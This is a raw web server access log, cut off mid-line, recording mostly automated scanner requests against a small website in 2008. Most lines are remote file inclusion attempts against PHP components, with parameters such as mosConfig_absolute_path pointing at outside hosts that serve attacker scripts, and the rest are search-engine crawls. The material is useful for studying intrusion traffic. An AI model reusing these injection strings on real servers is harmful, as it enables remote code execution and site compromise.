66.7.207.104 - - [01/Jun/2008:21:00:15 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.27.110.65 - - [01/Jun/2008:21:01:13 -0700] "GET /logs/access_080414.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.onlinebook.mn/blog/sites/default/files/KaBo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
208.131.142.223 - - [01/Jun/2008:21:02:16 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
208.131.142.223 - - [01/Jun/2008:21:02:16 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.91.240.117 - - [01/Jun/2008:21:03:04 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.91.240.117 - - [01/Jun/2008:21:03:04 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:21:03:17 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:21:03:18 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.27.110.65 - - [01/Jun/2008:21:03:22 -0700] "GET /logs/access_080414.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.onlinebook.mn/blog/sites/default/files/KaBo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
74.6.18.225 - - [01/Jun/2008:21:03:32 -0700] "GET /logs/?S=A HTTP/1.0" 200 7643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
203.194.209.79 - - [01/Jun/2008:21:03:59 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
203.194.209.79 - - [01/Jun/2008:21:04:00 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.52.136.89 - - [01/Jun/2008:21:04:18 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
72.52.136.89 - - [01/Jun/2008:21:04:18 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
85.214.48.26 - - [01/Jun/2008:21:04:39 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.214.48.26 - - [01/Jun/2008:21:04:40 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.6.18.225 - - [01/Jun/2008:21:04:57 -0700] "GET /logs/access_080519.log HTTP/1.0" 200 5693247 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:21:05:57 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:21:05:58 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.128.131.80 - - [01/Jun/2008:21:07:29 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.128.131.80 - - [01/Jun/2008:21:07:29 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
65.55.209.26 - - [01/Jun/2008:21:07:30 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.mathstamps.com"
65.55.209.26 - - [01/Jun/2008:21:07:30 -0700] "GET / HTTP/1.1" 200 779 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.mathstamps.com"
66.230.197.245 - - [01/Jun/2008:21:07:59 -0700] "GET /logs/access_080407.log//skin/zero_vote/ask_password.php?dir=http://www.wendyandkimberly.com/img/IDs.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.230.197.245 - - [01/Jun/2008:21:07:59 -07